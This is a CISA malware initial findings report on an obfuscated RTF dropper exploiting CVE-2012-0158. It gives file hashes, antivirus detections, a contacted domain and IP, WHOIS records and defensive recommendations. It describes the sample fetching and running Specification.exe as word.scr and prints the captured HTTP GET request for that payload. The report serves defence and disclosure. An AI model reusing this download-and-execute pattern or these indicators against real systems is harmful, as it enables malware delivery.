Analysis Report

MIFR-10079683-1.v2

Last Revised
Alert Code
AR20-133O
 

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This report contains information obtained from automated analysis and is not intended to be a complete description of the submitted sample. Results may be limited due to the complexity of the samples, or due to the ability of the samples to defend against automated analysis techniques. If additional information is required, please contact the Cybersecurity and Infrastructure Security Agency (CISA) using the information provided at the end of this report.

CISA received one artifact, ff4138ca9119ab0381ad6575f041e633, which appeared to be a crafted RTF document to perform penetration testing for the CVE-2012-0158 vulnerability found in Microsoft Office 2003, 2007 and 2010. It is actually an obfuscated RTF that when opened in Microsoft Word, it connected to nanocoatingindonesia.co.id and attempted to download an executable named Specification.exe, copied it over to word.scr and executed it immediately. At the time of this analysis, the domain returned HTTP 404 not found to the HTTP GET request.

For a downloadable copy of IOCs, see MIFR-10079683-1.v2.stix.

Files (1)

ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc (ff4138ca9119ab0381ad6575f041e6...)

Domains (1)

nanocoatingindonesia.co.id

IPs (1)

114.199.90.60

Findings

ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc

Tags

CVE-2012-0158droppertrojan

Details
Name ff4138ca9119ab0381ad6575f041e633
Size 1203123 bytes
Type Rich Text Format data, version 1, unknown character set
MD5 ff4138ca9119ab0381ad6575f041e633
SHA1 a3639691eb5fa1b41225ff35791f9931b62aeacd
SHA256 ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc
SHA512 42b47b48420367b4d4ce6e94d0d6e776d4ac903873324abd09c4e7776cf0cb5c79796421a6072f5d5624f09eb4080ed69799e6ebb23e68d3cc18f76240c3d1e9
ssdeep 96:GiIH6Q+Y2pbrh8mM/iBq7KWJZ6rBcClgJr3u17ejofQqa5hstzaqiFi12B7FiJi6:GlH6rfh8mQ7KraIwmzOiJN64g6mS12y
Entropy 2.667311
Antivirus
Ahnlab RTF/Exploit
Antiy Trojan[Exploit]/Office.CVE-2012-0158.h
Avira EXP/CVE-2012-0158.TJ
BitDefender Exploit.RTF.CVE-2012-0158.H
ClamAV Rtf.Dropper.Agent-1557037
Emsisoft Exploit.RTF.CVE-2012-0158.H (B)
Ikarus Trojan.Win32.Exploit
McAfee Exploit-CVE2012-0158.w
Microsoft Security Essentials Exploit:Win32/CVE-2012-0158
NANOAV Exploit.Rtf.Heuristic-rtf.dinbqn
Quick Heal Exp.RTF.Obfus.Gen
Sophos Troj/DocDrop-ID
Symantec Trojan.Mdropper
TACHYON Exploit.RTF.CVE-2012-0158.H
TrendMicro TROJ_MD.E9643850
TrendMicro House Call TROJ_MD.E9643850
YARA Rules

No matches found.

ssdeep Matches
99 41bc1f68ca81527487e22bb2bc3db796f5a8724258fc8769a288a6ff0f6875e5
Relationships
ebbca8bb8e... Connected_To nanocoatingindonesia.co.id
Description

FF4138CA9119AB0381AD6575F041E633 is an obfuscated RTF document, appeared to be crafted to perform penetration testing when examined under a hexadecimal editor. Close to the end of file, ASCII data "For pentesting purposes only!" and the MD5 hash value of the RTF were found.



However, when the RTF was opened in Microsoft Word, it sent a HTTP GET request to the domain nanocoatingindonesia.co.id in order to download a binary named Specification.exe. If successfully downloaded it would copy Specification.exe to word.scr and immediately execute it.



When the RTF was examined under a debugger, the location of word.scr was in the C:\Windows\system32 directory; word.scr ran on the system followed by a system crash and reboot. However, when the RTF was opened without a debugger, word.scr was copied to the same directory where RTF was located at and the system did not crash.



At the time of this analysis, nanocoatingindonesia.co.id returned HTTP 404 Not Found to the HTTP GET request for the Specification.exe binary.

Screenshots

Figure 1 -

Figure 2 -

Figure 3 -

Figure 4 -

nanocoatingindonesia.co.id

Tags

command-and-control

HTTP Sessions
  • GET /1/Specification.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

    Host: nanocoatingindonesia.co.id

    Connection: Keep-Alive



    HTTP/1.1 404 Not Found

    Date: Fri, 19 Aug 2016 xx:xx:xx GMT

    Server: Apache

    Content-Length: 336

    Connection: close

    Content-Type: text/html; charset=iso-8859-1



    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

    <html><head>

    <title>404 Not Found</title>

    </head><body>

    <h1>Not Found</h1>

    <p>The requested URL /1/Specification.exe was not found on this server.</p>

    <p>Additionally, a 404 Not Found

    error was encountered while trying to use an ErrorDocument to handle the request.</p>

    </body></html
Whois

Domain ID:PANDI-DO696479

Domain Name:NANOCOATINGINDONESIA.CO.ID

Created On:10-Mar-2016 04:31:11 UTC

Last Updated On:15-Mar-2016 04:42:05 UTC

Expiration Date:10-Mar-2017 23:59:59 UTC

Status:ok

Registrant ID:04nanoc1

Registrant Name:Nano Coating indonesia

Registrant Organization:PT Nano Coating Indonesia

Registrant Street1:Jl.Industri Selatan 7 Blok FF 1 C\nKawasan industri Jababeka 2

Registrant Street2:Jababeka Cikarang

Registrant City:bekasi

Registrant State/Province:Jawa Barat

Registrant Postal Code:17530

Registrant Country:ID

Registrant Phone:+62.2189842888x1234

Registrant FAX:+62.2189842777

Registrant Email:XX@primatigonglobal.co.id

Admin ID:04nanoc1

Admin Name:Nano Coating indonesia

Admin Organization:PT Nano Coating Indonesia

Admin Street1:Jl.Industri Selatan 7 Blok FF 1 C\nKawasan industri Jababeka 2

Admin Street2:Jababeka Cikarang

Admin City:bekasi

Admin State/Province:Jawa Barat

Admin Postal Code:17530

Admin Country:ID

Admin Phone:+62.2189842888x1234

Admin FAX:+62.2189842777

Admin Email:XX@primatigonglobal.co.id

Tech ID:04hendr62

Tech Name:Hendro

Tech Organization:PT Nano Coating Indonesia

Tech Street1:Jl.Industri Selatan 7 Blok FF 1 C.\nKawasan Industri Jababeka II Cikarang Kab.Bekasi

Tech City:Bekasi

Tech State/Province:Jawa Barat

Tech Postal Code:17530

Tech Country:ID

Tech Phone:+62.2189842888x1234

Tech FAX:+62.2189842777

Tech Email:XX@primatigonglobal.co.id

Billing ID:04nanoc1

Billing Name:Nano Coating indonesia

Billing Organization:PT Nano Coating Indonesia

Billing Street1:Jl.Industri Selatan 7 Blok FF 1 C\nKawasan industri Jababeka 2

Billing Street2:Jababeka Cikarang

Billing City:bekasi

Billing State/Province:Jawa Barat

Billing Postal Code:17530

Billing Country:ID

Billing Phone:+62.2189842888x1234

Billing FAX:+62.2189842777

Billing Email:XX@primatigonglobal.co.id

Sponsoring Registrar ID:indoreg

Sponsoring Registrar Organization:INDOREG

Sponsoring Registrar City:Jakarta

Sponsoring Registrar Postal Code:11520

Sponsoring Registrar Country:ID

Sponsoring Registrar Phone:0215821567

Name Server:NS5.INDOREG.CO.ID

Name Server:NS6.INDOREG.CO.ID

DNSSEC:Unsigned

Relationships
nanocoatingindonesia.co.id Resolved_To 114.199.90.60
nanocoatingindonesia.co.id Connected_From ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc

114.199.90.60

Relationships
114.199.90.60 Resolved_To nanocoatingindonesia.co.id

Relationship Summary

ebbca8bb8e... Connected_To nanocoatingindonesia.co.id
nanocoatingindonesia.co.id Resolved_To 114.199.90.60
nanocoatingindonesia.co.id Connected_From ebbca8bb8e0812f3f66e905a58800a3410ae26b9e1df233741f72021676360dc
114.199.90.60 Resolved_To nanocoatingindonesia.co.id

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.

Revisions

May 12, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.